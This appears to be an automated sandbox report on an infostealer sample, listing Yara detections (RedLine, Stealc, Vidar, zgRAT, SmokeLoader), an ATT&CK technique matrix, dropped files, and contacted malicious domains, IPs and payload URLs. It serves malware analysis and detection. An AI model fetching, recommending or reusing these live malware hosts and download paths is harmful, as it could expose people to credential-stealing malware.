Source: Yara match	File source: 1Vkf7silOj.exe, type: SAMPLE
Source: Yara match	File source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.RegAsm.exe.572b7e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 41.0.svhosts.exe.870000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.RegAsm.exe.3e79190.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.RegAsm.exe.4579ec.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.RegAsm.exe.4579ec.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.alex5555555.exe.a1fda6.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.alex5555555.exe.a1fda6.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.gold.exe.150000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.RegAsm.exe.572b7e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.alex5555555.exe.904c14.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.alex5555555.exe.904c14.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.alex5555555.exe.8b100f.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.RegAsm.exe.3e79190.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.1Vkf7silOj.exe.930000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.RegAsm.exe.403de7.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.RegAsm.exe.3e25570.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.alex5555555.exe.880000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000025.00000002.3823740608.0000000003E25000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.1961435191.000000000099D000.00000004.00000001.01000000.00000019.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.1961435191.00000000008AF000.00000004.00000001.01000000.00000019.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1936969540.000000000017F000.00000004.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.1843357617.0000000000891000.00000002.00000001.01000000.0000001C.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.1308164877.0000000000932000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.3789215805.00000000004F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.3789215805.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 1Vkf7silOj.exe PID: 6620, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: gold.exe PID: 7752, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7772, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: alex5555555.exe PID: 8560, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 8588, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 123.exe PID: 8716, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svhosts.exe PID: 8744, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000110001\123.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\123[1].exe, type: DROPPED

Yara detected SmokeLoader

Source: Yara match	File source: 00000021.00000002.2005785440.00000000023E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2007530947.0000000002521000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Stealc

Source: Yara match	File source: 00000036.00000002.2125675597.0000000003017000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 8196, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 54.2.aspnet_regiis.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 54.2.aspnet_regiis.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 52.2.TpWWMUpe0LEV.exe.6b6d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000034.00000002.1966115508.000000006B6EE000.00000004.00000001.01000000.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000036.00000002.2124198557.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 8196, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match	File source: 42.0.Explorers.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.alex5555555.exe.8b100f.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.RegAsm.exe.3e25570.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.RegAsm.exe.403de7.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.alex5555555.exe.8b100f.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.RegAsm.exe.403de7.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.RegAsm.exe.3e25570.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.alex5555555.exe.880000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Roaming\configurationValue\Explorers.exe, type: DROPPED

Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: 18_2_0061EB58 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,		18_2_0061EB58
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: 18_2_0061DE61 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,		18_2_0061DE61

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	221 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	21 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	14 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	1 Windows Service	11 Deobfuscate/Decode Files or Information	1 Credential API Hooking	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	1 Windows Service	612 Process Injection	41 Obfuscated Files or Information	11 Input Capture	3 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	11 Scheduled Task/Job	11 Scheduled Task/Job	11 Scheduled Task/Job	13 Software Packing	NTDS	459 System Information Discovery	Distributed Component Object Model	1 Credential API Hooking	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	2 PowerShell	1 Registry Run Keys / Startup Folder	1 Registry Run Keys / Startup Folder	1 Timestomp	LSA Secrets	13101 Security Software Discovery	SSH	11 Input Capture	115 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 File Deletion	DCSync	581 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Masquerading	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Modify Registry	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	581 Virtualization/Sandbox Evasion	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	612 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	1 Rundll32	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
1Vkf7silOj.exe	68%	ReversingLabs	ByteCode-MSIL.Trojan.RedLine
1Vkf7silOj.exe	64%	Virustotal		Browse
1Vkf7silOj.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\whiteheroin[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\ldr[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\gold[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\NewLatest[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\vcf-to-csv-converter[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\123[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\1[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\alex5555555[1].exe	100%	Joe Sandbox ML
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\ldr[1].exe	96%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\whiteheroin[1].exe	53%	ReversingLabs	ByteCode-MSIL.Trojan.RedLine
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\1[1].exe	54%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\alex5555555[1].exe	63%	ReversingLabs	Win32.Trojan.RedLine
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\gold[1].exe	88%	ReversingLabs	Win32.Trojan.LummaStealer
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\Installer[1].exe	34%	ReversingLabs	Win64.Trojan.Nekark
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\vcf-to-csv-converter[1].exe	24%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\123[1].exe	68%	ReversingLabs	ByteCode-MSIL.Trojan.RedLine
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\NewLatest[1].exe	96%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\vcruntime140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\1000020001\1.exe	54%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	88%	ReversingLabs	Win32.Trojan.LummaStealer
C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	96%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Temp\1000091001\Installer.exe	34%	ReversingLabs	Win64.Trojan.Nekark
C:\Users\user\AppData\Local\Temp\1000108001\ldr.exe	96%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Temp\1000109001\alex5555555.exe	63%	ReversingLabs	Win32.Trojan.RedLine
C:\Users\user\AppData\Local\Temp\1000110001\123.exe	68%	ReversingLabs	ByteCode-MSIL.Trojan.RedLine
C:\Users\user\AppData\Local\Temp\1000111001\O3B6wY7ZkFhh.exe	24%	ReversingLabs
C:\Users\user\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exe	53%	ReversingLabs	ByteCode-MSIL.Trojan.RedLine
C:\Users\user\AppData\Local\Temp\28feeece5c\Hkbsse.exe	96%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Temp\6.exe	54%	ReversingLabs	Win32.Trojan.LummaStealer
C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	96%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Roaming\configurationValue\Explorers.exe	39%	ReversingLabs	Win32.Trojan.Jalapeno
C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe	59%	ReversingLabs	ByteCode-MSIL.Trojan.RedLine
C:\Users\user\AppData\Roaming\d3d9.dll	50%	ReversingLabs	Win32.Trojan.LummaStealer

Source	Detection	Scanner	Label	Link
http://tempuri.org/	0%	URL Reputation	safe
https://api.ip.sb/ip	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/08/addressing	0%	URL Reputation	safe
https://ipinfo.io/	0%	URL Reputation	safe
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd	0%	URL Reputation	safe
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id23ResponseD	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id24LR	0%	Avira URL Cloud	safe
http://185.172.128.116/Mb3GvQs8/index.phpIN	100%	Avira URL Cloud	phishing
http://schemas.xmlsoap.org/ws/2005/02/sc/sct	0%	Avira URL Cloud	safe
https://facilitycoursedw.shop/api$	100%	Avira URL Cloud	malware
http://65.21.175.0	100%	Avira URL Cloud	malware
http://tempuri.org/Entity/Id2Response	0%	Avira URL Cloud	safe
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text	0%	Virustotal		Browse
http://tempuri.org/Entity/Id24LR	2%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2005/02/sc/sct	0%	Virustotal		Browse
http://tempuri.org/Entity/Id21Response	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id2Response	2%	Virustotal		Browse
http://65.21.175.0	1%	Virustotal		Browse
http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap	0%	Avira URL Cloud	safe
http://77.91.77.81/Kiru9gu/index.phpe	100%	Avira URL Cloud	phishing
http://77.91.77.81/lend/123.exed4	100%	Avira URL Cloud	phishing
http://tempuri.org/Entity/Id21Response	4%	Virustotal		Browse
http://tempuri.org/Entity/Id23ResponseD	1%	Virustotal		Browse
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap	0%	Virustotal		Browse
http://65.21.175.0/108e010e8f91c38c.phpWC	100%	Avira URL Cloud	malware
http://65.21.175.0/b13597c85f807692/msvcp140.dllEM	100%	Avira URL Cloud	malware
http://tempuri.org/Entity/Id13LR	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence	0%	Avira URL Cloud	safe
http://77.91.77.81/Kiru9gu/index.phpe	17%	Virustotal		Browse
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID	0%	Virustotal		Browse
http://tempuri.org/Entity/Id5LR	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2004/10/wsat/fault	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2004/10/wsat	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence	0%	Virustotal		Browse
http://tempuri.org/Entity/Id13LR	2%	Virustotal		Browse
https://iplogger.co/1lLub-&	100%	Avira URL Cloud	malware
http://Passport.NET/tb_	0%	Avira URL Cloud	safe
https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id5LR	2%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2004/10/wsat/fault	0%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey	0%	Avira URL Cloud	safe
http://qeqei.xyz/tmp/	100%	Avira URL Cloud	malware
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsenfo	0%	Avira URL Cloud	safe
http://Passport.NET/tb_	0%	Virustotal		Browse
https://facilitycoursedw.shop/apii	100%	Avira URL Cloud	malware
http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey	0%	Virustotal		Browse
http://185.172.128.116/Mb3GvQs8/index.phpFa	100%	Avira URL Cloud	phishing
http://schemas.xmlsoap.org/ws/2004/10/wsat	0%	Virustotal		Browse
http://crl.ver)	0%	Avira URL Cloud	safe
http://qeqei.xyz/tmp/	15%	Virustotal		Browse
https://facilitycoursedw.shop/apii	9%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id24Response	0%	Avira URL Cloud	safe
http://77.91.77.81/Kiru9gu/index.phptch	100%	Avira URL Cloud	phishing
http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id14LR	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1	0%	Virustotal		Browse
http://tempuri.org/Entity/Id24Response	1%	Virustotal		Browse
http://tempuri.org/Entity/Id6LR	0%	Avira URL Cloud	safe
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdes	0%	Avira URL Cloud	safe
https://doughtdrillyksow.shop/	100%	Avira URL Cloud	malware
http://77.91.77.81/Kiru9gu/index.phptch	4%	Virustotal		Browse
http://tempuri.org/Entity/Id10ResponseD	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id14LR	2%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego	0%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse	0%	Avira URL Cloud	safe
https://doughtdrillyksow.shop/	2%	Virustotal		Browse
https://bargainnygroandjwk.shop/	100%	Avira URL Cloud	malware
http://tempuri.org/Entity/Id6LR	2%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultH	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse	0%	Virustotal		Browse
http://tempuri.org/Entity/Id10ResponseD	1%	Virustotal		Browse
http://65.21.175.0/b13597c85f807692/msvcp140.dll	100%	Avira URL Cloud	malware
http://tempuri.org/Entity/Id5Response	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultH	0%	Virustotal		Browse
http://tempuri.org/Entity/Id15ResponseD	0%	Avira URL Cloud	safe
http://185.172.128.116/erences.SourceAumid	100%	Avira URL Cloud	phishing
http://tempuri.org/Entity/Id10Response	0%	Avira URL Cloud	safe
http://moreapp4you.online	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id8Response	0%	Avira URL Cloud	safe
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdes	1%	Virustotal		Browse
http://tempuri.org/Entity/Id22LR	0%	Avira URL Cloud	safe
http://65.21.175.0/b13597c85f807692/vcruntime140.dll	100%	Avira URL Cloud	malware
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID	0%	Avira URL Cloud	safe
https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2006/02/addressingidentity	0%	Avira URL Cloud	safe
https://login.microsoftonline.com/ppsecure/DeviceQuery.srf	0%	Avira URL Cloud	safe
https://pixel.com/	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id7LR	0%	Avira URL Cloud	safe
http://65.21.175.0/b13597c85f807692/vcruntime140.dllka	100%	Avira URL Cloud	malware
http://tempuri.org/Entity/Id11LR	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce	0%	Avira URL Cloud	safe
http://docs.oasis-open.org	0%	Avira URL Cloud	safe
http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id9On	0%	Avira URL Cloud	safe
http://www.w3.o	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
pixel.com	54.67.42.145	true	false	unknown
moreapp4you.online	31.31.196.208	true	false	unknown
github.com	140.82.121.3	true	false	unknown
bit.ly	67.199.248.11	true	true	unknown
www.google.com	216.58.206.36	true	false	unknown
iplogger.co	172.67.167.249	true	false	unknown
biancolevrin.com	103.28.36.182	true	false	unknown
objects.githubusercontent.com	185.199.111.133	true	false	unknown
leafcalfconflcitw.shop	unknown	unknown	true	unknown
facilitycoursedw.shop	unknown	unknown	true	unknown
time.windows.com	unknown	unknown	true	unknown
publicitycharetew.shop	unknown	unknown	true	unknown
computerexcudesp.shop	unknown	unknown	true	unknown
disappointcredisotw.shop	unknown	unknown	true	unknown
doughtdrillyksow.shop	unknown	unknown	true	unknown
injurypiggyoewirog.shop	unknown	unknown	true	unknown
bargainnygroandjwk.shop	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://qeqei.xyz/tmp/	true	15%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://ipinfo.io/	false	URL Reputation: safe	unknown
http://65.21.175.0/b13597c85f807692/msvcp140.dll	true	Avira URL Cloud: malware	unknown
http://65.21.175.0/b13597c85f807692/vcruntime140.dll	true	Avira URL Cloud: malware	unknown
https://pixel.com/	false	Avira URL Cloud: safe	unknown
185.215.113.67:40960	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text	1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/sc/sct	1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id24LR	RegAsm.exe, 0000000D.00000002.3821279083.0000000002F87000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D5D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000003031000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F38000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DAE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002EE9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002FE3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DFD000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://185.172.128.116/Mb3GvQs8/index.phpIN	Hkbsse.exe, 00000013.00000002.3791168067.000000000153B000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://tempuri.org/Entity/Id23ResponseD	1Vkf7silOj.exe, 00000001.00000002.1586636370.00000000031A4000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://facilitycoursedw.shop/api$	6.exe, 00000008.00000002.1557078307.0000000001842000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://65.21.175.0	aspnet_regiis.exe, 00000036.00000002.2125675597.0000000003017000.00000004.00000020.00020000.00000000.sdmp	true	1%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://tempuri.org/	1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002851000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
